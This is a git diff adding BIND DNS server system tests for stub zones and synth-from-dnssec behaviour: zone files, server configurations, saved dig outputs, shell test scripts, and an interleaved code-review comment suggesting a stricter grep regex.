@@ -0,0 +1,21 @@ + +; <<>> DiG 8.2 <<>> -p @10.53.0.3 +norec data.child.example txt +; (1 server found) +;; res options: init defnam dnsrch +;; got answer: +;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 216 +;; flags: qr ra ad; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1 +;; QUERY SECTION: +;; data.child.example, type = TXT, class = IN + +;; AUTHORITY SECTION: +child.example. 5M IN NS ns2.child.example. + +;; ADDITIONAL SECTION: +ns2.child.example. 5M IN A 10.53.0.2 + +;; Total query time: 3 msec +;; FROM: draco to SERVER: 10.53.0.3 +;; WHEN: Wed Jun 21 10:58:37 2000 +;; MSG SIZE sent: 36 rcvd: 70 + diff --git a/bin/tests/system/stub/knowngood.dig.out.rec b/bin/tests/system/stub/knowngood.dig.out.rec new file mode 100644 index 0000000..8ea1968 --- /dev/null +++ b/bin/tests/system/stub/knowngood.dig.out.rec @@ -0,0 +1,18 @@ + +; <<>> DiG 8.2 <<>> -p @10.53.0.3 data.child.example txt +; (1 server found) +;; res options: init recurs defnam dnsrch +;; got answer: +;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 6 +;; flags: qr rd ra ad; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 1 +;; QUERY SECTION: +;; data.child.example, type = TXT, class = IN + +;; ANSWER SECTION: +data.child.example. 5M IN TXT "some" "test" "data" + +;; Total query time: 8 msec +;; FROM: draco to SERVER: 10.53.0.3 +;; WHEN: Wed Jun 21 10:58:54 2000 +;; MSG SIZE sent: 36 rcvd: 97 + diff --git a/bin/tests/system/stub/ns1/named.conf.in b/bin/tests/system/stub/ns1/named.conf.in new file mode 100644 index 0000000..765cf69 --- /dev/null +++ b/bin/tests/system/stub/ns1/named.conf.in 
@@ -0,0 +1,30 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + minimal-responses no; +}; + +zone "." { + type primary; + file "root.db"; +}; diff --git a/bin/tests/system/stub/ns1/root.db b/bin/tests/system/stub/ns1/root.db new file mode 100644 index 0000000..361f93e --- /dev/null +++ b/bin/tests/system/stub/ns1/root.db @@ -0,0 +1,24 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +. IN SOA gson.nominum.com. a.root.servers.nil. ( + 2000042100 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +. NS a.root-servers.nil. +a.root-servers.nil. A 10.53.0.1 + +example. NS ns3.example. +ns3.example. A 10.53.0.3 diff --git a/bin/tests/system/stub/ns2/child.example.db b/bin/tests/system/stub/ns2/child.example.db new file mode 100644 index 0000000..9b50a2a --- /dev/null +++ b/bin/tests/system/stub/ns2/child.example.db 
@@ -0,0 +1,22 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +child.example. IN SOA ns2.child.example. hostmaster.child.example. ( + 2000042795 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +child.example. NS ns2.child.example. +ns2.child.example. A 10.53.0.2 +data TXT some test data diff --git a/bin/tests/system/stub/ns2/named.conf.in b/bin/tests/system/stub/ns2/named.conf.in new file mode 100644 index 0000000..2936482 --- /dev/null +++ b/bin/tests/system/stub/ns2/named.conf.in @@ -0,0 +1,35 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + minimal-responses no; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "child.example" { + type primary; + file "child.example.db"; +}; diff --git a/bin/tests/system/stub/ns3/example.db b/bin/tests/system/stub/ns3/example.db new file mode 100644 index 0000000..4d0b3f0 --- /dev/null +++ b/bin/tests/system/stub/ns3/example.db 
@@ -0,0 +1,22 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$ORIGIN . +$TTL 300 ; 5 minutes +example IN SOA ns3.example. hostmaster.example. ( + 2000042795 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +example. NS ns3.example. +ns3.example. A 10.53.0.3 diff --git a/bin/tests/system/stub/ns3/named.conf.in b/bin/tests/system/stub/ns3/named.conf.in new file mode 100644 index 0000000..3236889 --- /dev/null +++ b/bin/tests/system/stub/ns3/named.conf.in @@ -0,0 +1,41 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + recursion yes; + notify yes; + minimal-responses no; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "example" { + type primary; + file "example.db"; +}; + +zone "child.example" { + type stub; + file "child.example.st"; + primaries { 10.53.0.2; }; +}; diff --git a/bin/tests/system/stub/ns4/example.db b/bin/tests/system/stub/ns4/example.db new file mode 100644 index 0000000..1afe983 --- /dev/null 
+++ b/bin/tests/system/stub/ns4/example.db @@ -0,0 +1,23 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA ns4.example. hostmaster.example. ( + 2000042795 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +@ IN NS ns4 +ns4 IN A 10.53.0.4 + IN AAAA fd92:7065:b8e:ffff::4 +target IN TXT "test" diff --git a/bin/tests/system/stub/ns4/named.conf.in b/bin/tests/system/stub/ns4/named.conf.in new file mode 100644 index 0000000..7e53972 --- /dev/null +++ b/bin/tests/system/stub/ns4/named.conf.in @@ -0,0 +1,31 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.4; + notify-source 10.53.0.4; + transfer-source 10.53.0.4; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.4; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + minimal-responses yes; + dnssec-validation no; +}; + +zone "example" { + type primary; + file "example.db"; +}; diff --git a/bin/tests/system/stub/ns5/named.conf.in b/bin/tests/system/stub/ns5/named.conf.in new file mode 100644 index 0000000..8897eac --- /dev/null +++ b/bin/tests/system/stub/ns5/named.conf.in 
@@ -0,0 +1,34 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.5;
+ notify-source 10.53.0.5;
+ transfer-source 10.53.0.5;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.5; };
+ listen-on-v6 { none; };
+ dnssec-validation no;
+};
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
+
+zone "example" {
+ type stub;
+ file "example.db";
+ masters { 10.53.0.4 port @PORT@; };
+};
diff --git a/bin/tests/system/stub/setup.sh b/bin/tests/system/stub/setup.sh
new file mode 100644
index 0000000..ccb59d4
--- /dev/null
+++ b/bin/tests/system/stub/setup.sh
@@ -0,0 +1,21 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+copy_setports ns1/named.conf.in ns1/named.conf
+copy_setports ns2/named.conf.in ns2/named.conf
+copy_setports ns3/named.conf.in ns3/named.conf
+copy_setports ns4/named.conf.in ns4/named.conf
+copy_setports ns5/named.conf.in ns5/named.conf
diff --git a/bin/tests/system/stub/tests.sh b/bin/tests/system/stub/tests.sh
new file mode 100644
index 0000000..6d5d110
--- /dev/null
+++ b/bin/tests/system/stub/tests.sh
@@ -0,0 +1,87 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +DIGOPTS="+tcp -p ${PORT}" + +status=0 +echo_i "check that the stub zone has been saved to disk" +for i in 1 2 3 4 5 6 7 8 9 20 +do + [ -f ns3/child.example.st ] && break + sleep 1 +done +[ -f ns3/child.example.st ] || { status=1; echo_i "failed"; } + +for pass in 1 2 +do + +echo_i "trying an axfr that should be denied (NOTAUTH) (pass=$pass)" +ret=0 +$DIG $DIGOPTS child.example. @10.53.0.3 axfr > dig.out.ns3 || ret=1 +grep "; Transfer failed." dig.out.ns3 > /dev/null || ret=1 +[ $ret = 0 ] || { status=1; echo_i "failed"; } + +echo_i "look for stub zone data without recursion (should not be found) (pass=$pass)" +for i in 1 2 3 4 5 6 7 8 9 +do + ret=0 + $DIG $DIGOPTS +norec data.child.example. \ + @10.53.0.3 txt > dig.out.ns3 || ret=1 + grep "status: NOERROR" dig.out.ns3 > /dev/null || ret=1 + [ $ret = 0 ] && break + sleep 1 +done +digcomp knowngood.dig.out.norec dig.out.ns3 || ret=1 +[ $ret = 0 ] || { status=1; echo_i "failed"; } + +echo_i "look for stub zone data with recursion (should be found) (pass=$pass)" +ret=0 +$DIG $DIGOPTS +noauth +noadd data.child.example. 
@10.53.0.3 txt > dig.out.ns3 || ret=1 +digcomp knowngood.dig.out.rec dig.out.ns3 || ret=1 +[ $ret = 0 ] || { status=1; echo_i "failed"; } + +[ $pass = 1 ] && { + echo_i "stopping stub server" + stop_server ns3 + + echo_i "re-starting stub server" + start_server --noclean --restart --port ${PORT} ns3 +} +done + +echo_i "check that glue record is correctly transferred from master when minimal-responses is on" +ret=0 +# First ensure that zone data was transfered. +for i in 1 2 3 4 5 6 7; do + [ -f ns5/example.db ] && break + sleep 1 +done + +if [ -f ns5/example.db ]; then + # If NS glue wasn't transferred, this query would fail. + $DIG $DIGOPTS +nodnssec @10.53.0.5 target.example. txt > dig.out.ns5 || ret=1 + grep 'target\.example.*TXT.*"test"' dig.out.ns5 > /dev/null || ret=1 + # Ensure both ipv4 and ipv6 glue records were transferred. + grep -E 'ns4[[:space:]]+A[[:space:]]+10.53.0.4' ns5/example.db > /dev/null || ret=1 + grep -E 'AAAA[[:space:]]+fd92:7065:b8e:ffff::4' ns5/example.db > /dev/null || ret=1 + [ $ret = 0 ] || { status=1; echo_i "failed"; } +else + status=1 + echo_i "failed: stub zone transfer failed ns4(master) <---> ns5/example.db" +fi + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/synthfromdnssec/clean.sh b/bin/tests/system/synthfromdnssec/clean.sh new file mode 100644 index 0000000..56ec876 --- /dev/null +++ b/bin/tests/system/synthfromdnssec/clean.sh 
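Review bot: The two glue checks near the end of this hunk leave the dots of the address unescaped in an extended regex, `grep -E 'ns4[[:space:]]+A[[:space:]]+10.53.0.4'`, so each `.` matches any character and the assertion is looser than the `target\.example` pattern two lines above it. Writing it as `grep -E 'ns4[[:space:]]+A[[:space:]]+10\.53\.0\.4' ns5/example.db > /dev/null || ret=1` keeps the match exact. The first wait loop also iterates over `1 2 3 4 5 6 7 8 9 20`, where `20` looks like a typo for `10` (harmless, since `i` is unused), and the comment above the second wait loop should read "transferred".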
@@ -0,0 +1,31 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+set -e
+
+rm -f ./*/named.memstats
+rm -f ./*/named.conf
+rm -f ./*/named.run
+rm -f ./dig.out.*
+rm -f ./ns1/K*+*+*.key
+rm -f ./ns1/K*+*+*.private
+rm -f ./ns1/dsset-*
+rm -f ./ns1/example.db
+rm -f ./ns1/example.db.signed
+rm -f ./ns1/dnamed.db
+rm -f ./ns1/dnamed.db.signed
+rm -f ./ns1/root.db
+rm -f ./ns1/root.db.signed
+rm -f ./ns1/trusted.conf
+rm -f ./ns2/named_dump.db
+rm -f ./ns*/managed-keys.bind*
diff --git a/bin/tests/system/synthfromdnssec/ns1/dnamed.db.in b/bin/tests/system/synthfromdnssec/ns1/dnamed.db.in
new file mode 100644
index 0000000..299adb2
--- /dev/null
+++ b/bin/tests/system/synthfromdnssec/ns1/dnamed.db.in
@@ -0,0 +1,16 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 3600
+@ SOA ns1 hostmaster 1 3600 1200 604800 3600
+@ NS ns1
+ns1 A 10.53.0.1
+a A 10.53.0.1
diff --git a/bin/tests/system/synthfromdnssec/ns1/example.db.in b/bin/tests/system/synthfromdnssec/ns1/example.db.in
new file mode 100644
index 0000000..90629a7
--- /dev/null
+++ b/bin/tests/system/synthfromdnssec/ns1/example.db.in
@@ -0,0 +1,19 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 3600
+@ SOA ns1 hostmaster 1 3600 1200 604800 3600
+@ NS ns1
+ns1 A 10.53.0.1
+nodata TXT nodata
+*.wild-a A 1.2.3.4
+*.wild-cname CNAME ns1
+dnamed DNAME dnamed.
diff --git a/bin/tests/system/synthfromdnssec/ns1/named.conf.in b/bin/tests/system/synthfromdnssec/ns1/named.conf.in
new file mode 100644
index 0000000..8b1954f
--- /dev/null
+++ b/bin/tests/system/synthfromdnssec/ns1/named.conf.in
@@ -0,0 +1,44 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS1
+
+options {
+ query-source address 10.53.0.1;
+ notify-source 10.53.0.1;
+ transfer-source 10.53.0.1;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.1; };
+ listen-on-v6 { none; };
+ recursion no;
+ notify yes;
+ dnssec-validation yes;
+};
+
+zone "." {
+ type primary;
+ file "root.db.signed";
+};
+
+zone "example" {
+ type primary;
+ file "example.db.signed";
+};
+
+zone "dnamed" {
+ type primary;
+ file "dnamed.db.signed";
+};
+
+include "trusted.conf";
diff --git a/bin/tests/system/synthfromdnssec/ns1/root.db.in b/bin/tests/system/synthfromdnssec/ns1/root.db.in
new file mode 100644
index 0000000..ad43527
--- /dev/null
+++ b/bin/tests/system/synthfromdnssec/ns1/root.db.in
@@ -0,0 +1,19 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 3600
+@ SOA ns1 hostmaster 1 3600 1200 604800 3600
+@ NS ns1
+ns1 A 10.53.0.1
+example NS ns1.example
+ns1.example A 10.53.0.1
+dnamed NS ns1.dnamed
+ns1.dnamed A 10.53.0.1
diff --git a/bin/tests/system/synthfromdnssec/ns1/sign.sh b/bin/tests/system/synthfromdnssec/ns1/sign.sh
new file mode 100644
index 0000000..2240767
--- /dev/null
+++ b/bin/tests/system/synthfromdnssec/ns1/sign.sh
@@ -0,0 +1,45 @@
+#!/bin/sh -e
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+# shellcheck source=conf.sh
+. "$SYSTEMTESTTOP/conf.sh"
+
+zone=example
+infile=example.db.in
+zonefile=example.db
+
+keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone $zone)
+cat "$infile" "$keyname.key" > "$zonefile"
+
+$SIGNER -P -o $zone $zonefile > /dev/null
+
+zone=dnamed
+infile=dnamed.db.in
+zonefile=dnamed.db
+
+keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone $zone)
+cat "$infile" "$keyname.key" > "$zonefile"
+
+$SIGNER -P -o $zone $zonefile > /dev/null
+
+zone=.
+infile=root.db.in
+zonefile=root.db
+
+keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -b ${DEFAULT_BITS} -n zone $zone)
+cat "$infile" "$keyname.key" > "$zonefile"
+
+$SIGNER -P -g -o $zone $zonefile > /dev/null
+
+# Configure the resolving server with a static key.
+keyfile_to_static_ds "$keyname" > trusted.conf
diff --git a/bin/tests/system/synthfromdnssec/ns2/named.conf.in b/bin/tests/system/synthfromdnssec/ns2/named.conf.in
new file mode 100644
index 0000000..8b0e8d4
--- /dev/null
+++ b/bin/tests/system/synthfromdnssec/ns2/named.conf.in
@@ -0,0 +1,34 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS2
+
+options {
+ query-source address 10.53.0.2;
+ notify-source 10.53.0.2;
+ transfer-source 10.53.0.2;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ recursion yes;
+ notify no;
+ dnssec-validation yes;
+};
+
+zone "." {
+ type hint;
+ file "root.hints";
+};
+
+include "../ns1/trusted.conf";
diff --git a/bin/tests/system/synthfromdnssec/ns2/root.hints b/bin/tests/system/synthfromdnssec/ns2/root.hints
new file mode 100644
index 0000000..6b80b9e
--- /dev/null
+++ b/bin/tests/system/synthfromdnssec/ns2/root.hints
@@ -0,0 +1,13 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+. NS ns1
+ns1 A 10.53.0.1
diff --git a/bin/tests/system/synthfromdnssec/ns3/named.conf.in b/bin/tests/system/synthfromdnssec/ns3/named.conf.in
new file mode 100644
index 0000000..a260561
--- /dev/null
+++ b/bin/tests/system/synthfromdnssec/ns3/named.conf.in
@@ -0,0 +1,39 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS3
+
+options {
+ query-source address 10.53.0.3;
+ notify-source 10.53.0.3;
+ transfer-source 10.53.0.3;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.3; };
+ listen-on-v6 { none; };
+ recursion yes;
+ notify no;
+ dnssec-validation yes;
+};
+
+zone "." {
+ type hint;
+ file "root.hints";
+};
+
+zone "." {
+ type redirect;
+ file "redirect.db";
+};
+
+include "../ns1/trusted.conf";
diff --git a/bin/tests/system/synthfromdnssec/ns3/redirect.db b/bin/tests/system/synthfromdnssec/ns3/redirect.db
new file mode 100644
index 0000000..c529ad2
--- /dev/null
+++ b/bin/tests/system/synthfromdnssec/ns3/redirect.db
@@ -0,0 +1,20 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300
+@ IN SOA ns.example.net hostmaster.example.net 0 0 0 0 0
+@ IN NS ns.example.net
+;
+; NS records do not need address records in this zone as it is not in the
+; normal namespace.
+;
+*.redirect. IN A 100.100.100.2
+*.redirect. IN AAAA 2001:ffff:ffff::100.100.100.2
diff --git a/bin/tests/system/synthfromdnssec/ns3/root.hints b/bin/tests/system/synthfromdnssec/ns3/root.hints
new file mode 100644
index 0000000..6b80b9e
--- /dev/null
+++ b/bin/tests/system/synthfromdnssec/ns3/root.hints
@@ -0,0 +1,13 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+. NS ns1
+ns1 A 10.53.0.1
diff --git a/bin/tests/system/synthfromdnssec/ns4/named.conf.in b/bin/tests/system/synthfromdnssec/ns4/named.conf.in
new file mode 100644
index 0000000..9ecdd0e
--- /dev/null
+++ b/bin/tests/system/synthfromdnssec/ns4/named.conf.in
@@ -0,0 +1,35 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS4
+
+options {
+ query-source address 10.53.0.4;
+ notify-source 10.53.0.4;
+ transfer-source 10.53.0.4;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.4; };
+ listen-on-v6 { none; };
+ recursion yes;
+ notify no;
+ dnssec-validation yes;
+ synth-from-dnssec no;
+};
+
+zone "." {
+ type hint;
+ file "root.hints";
+};
+
+include "../ns1/trusted.conf";
diff --git a/bin/tests/system/synthfromdnssec/ns4/root.hints b/bin/tests/system/synthfromdnssec/ns4/root.hints
new file mode 100644
index 0000000..6b80b9e
--- /dev/null
+++ b/bin/tests/system/synthfromdnssec/ns4/root.hints
@@ -0,0 +1,13 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+. NS ns1
+ns1 A 10.53.0.1
diff --git a/bin/tests/system/synthfromdnssec/ns5/named.conf.in b/bin/tests/system/synthfromdnssec/ns5/named.conf.in
new file mode 100644
index 0000000..6fa0009
--- /dev/null
+++ b/bin/tests/system/synthfromdnssec/ns5/named.conf.in
@@ -0,0 +1,35 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS5
+
+options {
+ query-source address 10.53.0.5;
+ notify-source 10.53.0.5;
+ transfer-source 10.53.0.5;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.5; };
+ listen-on-v6 { none; };
+ recursion yes;
+ notify no;
+ dnssec-validation yes;
+ synth-from-dnssec yes;
+};
+
+zone "." {
+ type hint;
+ file "root.hints";
+};
+
+include "../ns1/trusted.conf";
diff --git a/bin/tests/system/synthfromdnssec/ns5/root.hints b/bin/tests/system/synthfromdnssec/ns5/root.hints
new file mode 100644
index 0000000..6b80b9e
--- /dev/null
+++ b/bin/tests/system/synthfromdnssec/ns5/root.hints
@@ -0,0 +1,13 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+. NS ns1
+ns1 A 10.53.0.1
diff --git a/bin/tests/system/synthfromdnssec/setup.sh b/bin/tests/system/synthfromdnssec/setup.sh
new file mode 100644
index 0000000..6f7bc7c
--- /dev/null
+++ b/bin/tests/system/synthfromdnssec/setup.sh
@@ -0,0 +1,28 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
